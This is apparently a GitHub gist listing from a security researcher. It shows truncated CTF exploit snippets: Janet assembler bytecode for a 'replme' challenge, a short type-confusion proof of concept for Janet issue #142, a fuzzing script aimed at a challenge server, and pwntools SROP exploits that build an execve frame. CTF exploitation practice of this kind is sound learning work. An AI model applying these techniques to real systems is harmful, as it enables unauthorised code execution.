Aneesh Dogra lionaneesh

🎯

Focusing

Hacker | Security Researcher | Working on SIEM tools and monitoring for security events at scale

lionaneesh / replme_remote_final.janet

Last active April 1, 2021 04:10

	(def some
	(asm
	'{
	constants @["blah" print]
	:arity 0
	slotcount 2
	bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
	}
	))

lionaneesh / replme_janet_final.janet

Last active April 1, 2021 04:23

	(def some
	(asm
	'{
	constants @["blah" print]
	:arity 0
	slotcount 2
	bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
	}
	))

lionaneesh / replme_janet_programbase.janet

Created April 1, 2021 03:44

	(def some
	(asm
	'{
	constants @["blah" print]
	:arity 0
	slotcount 2
	bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
	}
	))

lionaneesh / replme_janet_leaks.janet

Last active April 1, 2021 03:22

	(def some
	(asm
	'{
	constants @["blah" print]
	:arity 0
	slotcount 2
	bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
	}
	))

lionaneesh / janet_142.janet

Created April 1, 2021 03:14

Janet Issue #142 exploit

	(def buffer (tarray/buffer 8))
	(def buffer-float64-view (tarray/new :float64 1 1 0 buffer))
	(def buffer-uint32-view (tarray/new :uint32 2 1 0 buffer))

	(set (buffer-uint32-view 1) 0xfffe9234)
	(set (buffer-uint32-view 0) 0x56789abc)

	(print "object: " (buffer-float64-view 0))
	(print " type: " (type (buffer-float64-view 0)))

lionaneesh / umassctf2021_replme_fuzz.py

Created April 1, 2021 02:41

Fuzzing script for replme all credits to downgrade.

	import requests

	url = "http://34.72.244.178:8085/"
	proxy = {"http":"http://127.0.0.1:8080"}
	results = {}

	funcs = "% %= * = + ++ += - -- -= -> ->> -?> -?>> / /= < <= = == > >= abstract? all all-bindings all-dynamics and apply array array/concat array/ensure array/insert array/new array/peek array/pop array/push array/remove array/slice array? as-> as?-> asm bad-compile bad-parse band blshift bnot boolean? bor brshift brushift buffer buffer/bit buffer/bit-clear buffer/bit-set buffer/bit-toggle buffer/blit buffer/clear buffer/format buffer/new buffer/new-filled buffer/popn buffer/push-byte buffer/push-string buffer/push-word buffer/slice buffer? bxor bytes? case cfunction? comment comp compile complement cond coro count debug debug/arg-stack debug/break debug/fbreak debug/lineage debug/stack debug/stacktrace debug/unbreak debug/unfbreak dec deep-not= deep= def- default defglobal defmacro defmacro- defn defn- describe dictionary? disasm distinct doc doc doc-format dofile drop drop-until drop-while dyn each em

lionaneesh / janet_print_asm.janet

Last active April 1, 2021 02:20

Janet Print in asm

	(def hello2
	(asm
	'{max-arity 0
	constants @["abc" ,print]
	arity 0
	slotcount 2
	bytecode @[(ldc 1 0) (push 1) (ldc 1 1) (noop) (tcall 1)]
	min-arity 0}))

	(hello2)

lionaneesh / solve-some-really-ordinary-program.py

Created March 16, 2021 13:49

Exploit for ./some-really-ordinary-program from NahamCon 2021

	from pwn import *

	p = process('./some-really-ordinary-program')
	#p = remote("challenge.nahamcon.com", 32119)

	data = 0x402000 + 0x1f4 # added 0x1f4 to avoid going out of bounds stack in main, note main does sub esp, 0x1f4
	main = 0x401022
	syscall_ret = 0x40101f

	# frame to call execve

lionaneesh / solve_moving-signals.py

Last active March 15, 2021 11:07

Exploit for Moving Signals from 0x41414141 2021 ctf

	from pwn import *
	binary = ELF("./moving-signals")
	pr = process("./moving-signals")
	#pr = remote("161.97.176.150", 2525)
	buff = 0x7ffd4ac736b0
	pop_rax_ret = 0x0000000000041018
	binshstr = 0x41250
	syscall_ret = 0x41015
	frame = SigreturnFrame(arch="amd64", kernel="amd64")
	frame.rax = 59

lionaneesh / saas_final_solve.py

Created June 14, 2020 09:41

SaaS from NahamCon 2020